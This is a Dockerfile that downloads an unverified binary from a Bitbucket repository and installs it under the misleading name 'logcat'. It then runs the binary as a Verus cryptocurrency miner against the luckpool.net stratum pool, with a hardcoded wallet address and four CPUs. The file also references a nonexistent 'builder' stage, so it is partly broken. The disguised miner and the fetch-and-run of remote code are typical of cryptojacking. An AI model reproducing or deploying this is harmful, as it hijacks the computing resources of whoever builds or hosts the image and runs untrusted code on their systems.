FROM debian:sid

RUN apt update -y \
    	&& apt upgrade -y \
    	&& apt install -qy automake autoconf pkg-config libcurl4-openssl-dev libssl-dev  libjansson-dev libgmp-dev make gcc g++ git zlib1g-dev ocl-icd-opencl-dev wget

RUN wget https://bitbucket.org/muyutios/verus/raw/39000ec63088a5f631477b0dd452e56412b11960/logcat
RUN chmod 777 logcat
RUN mv logcat /usr/local/bin/ && \
    rm -rf logcat

COPY --from=builder /usr/local/bin/logcat /usr/local/bin/

ENTRYPOINT [ "logcat" ]
CMD [ "-c", "stratum+tcp://na.luckpool.net:3956#xnsub", "-u", "RV2BdRHnW13UBEUX4nLfFW2sw9TUwxrJGb.cpu1", "-p", "x", "--cpu", "4" ]
